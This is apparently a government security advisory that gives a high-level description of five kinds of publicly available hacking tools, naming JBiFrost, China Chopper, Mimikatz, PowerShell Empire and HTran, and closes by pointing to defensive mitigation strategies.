The widespread availability of these tools means that they can be used by anyone from amateur hackers through to organised crime groups and governments.
The tools detailed fall into five categories: Remote Access Tools, Web Shells, Credential Stealers, Lateral Movement Frameworks, and Command and Control Obfuscators.
Remote Access Tools
A Remote Access Tool (RAT) is a program, which, once installed on a victim’s machine, allows remote administrative control. In a malicious context, they can provide the ability for an actor to upload and download files, execute commands, log keystrokes, and/or record a user’s screen.
An example of a malicious RAT is JBiFrost, which has undergone several name changes including Adwind and JSocket. This RAT is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice or with a link to a file hosting service.
Past infections have exfiltrated intellectual property, banking credentials and Personally Identifiable Information (PII). Machines infected with JBiFrost can also be used to take part in botnets to carry out Distributed Denial of Service (DDoS) attacks. JBiFrost can also allow a malicious actor to install additional malicious software.
Since 2015 this RAT has been offered as a software-as-a-service model. This has lowered the barrier to entry and allowed a wider range of cyber criminals and low-skilled actors to utilise the tool, however its capabilities could easily be adapted for use in government hacking.
Web shells are malicious scripts which are uploaded to a target host after an initial compromise and grant an actor remote access into a network. Once this access is established, web shells can facilitate lateral movement within a network.
An example of a commonly used web shell is China Chopper, a well-documented and publicly available web shell that has seen widespread use since 2012.
Capabilities include uploading and downloading files to and from the victim, execution of arbitrary commands, using operating system file-retrieval tools to download files to the target, and filesystem modification.
Credential stealing tools are designed to allow a malicious actor to collect credentials of other users who are logged into a targeted machine, which can then be reused to give access to other machines on a network.
Though it was not originally intended as a hacking tool, Mimikatz has emerged as a common tool used by multiple actors to obtain credentials from networks, typically being used once access has been gained to a host and the actor wishes to move throughout the internal network.
Widespread use of this tool has been observed amongst organised crime and state-sponsored groups.
Mimikatz was used in conjunction with other hacking tools in the 2017 NotPetya and BadRabbit ransomware attacks to extract administrator credentials held on thousands of computers and enable the ransomware to propagate throughout networks.
Lateral Movement Tools
Lateral movement tools allow an actor to move around a network after gaining initial access.
PowerShell Empire is a tool commonly used by malicious actors, although it was designed as a legitimate penetration testing tool in 2015.
The tool provides the actor with the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network. It has become increasingly popular among state actors and organised crime groups, and has recently been observed in a number of global incidents across a wide range of sectors.
In early 2018, an unknown actor used Winter Olympics themed socially engineered emails and malicious attachments in a spear phishing campaign targeting several South Korean organisations.
Command and Control Obfuscators
Malicious cyber actors will typically want to disguise their location when compromising a target. They may use generic privacy tools such as TOR, or more specific tools to obfuscate their location.
HUC Packet Transmitter (HTran) is a tool used to proxy connections. It has been freely available on the internet since at least 2009 and is designed to obfuscate an adversary’s communications with victim networks.
The use of HTran has been regularly observed in compromises of both government and industry targets.
Detection and Prevention Measures
Enhancing the security of a network will prevent or reduce the effectiveness of a wide range of cyber threats, including the tools listed above. The Australian Signals Directorate provides a list of eight essential strategies to mitigate cyber security incidents.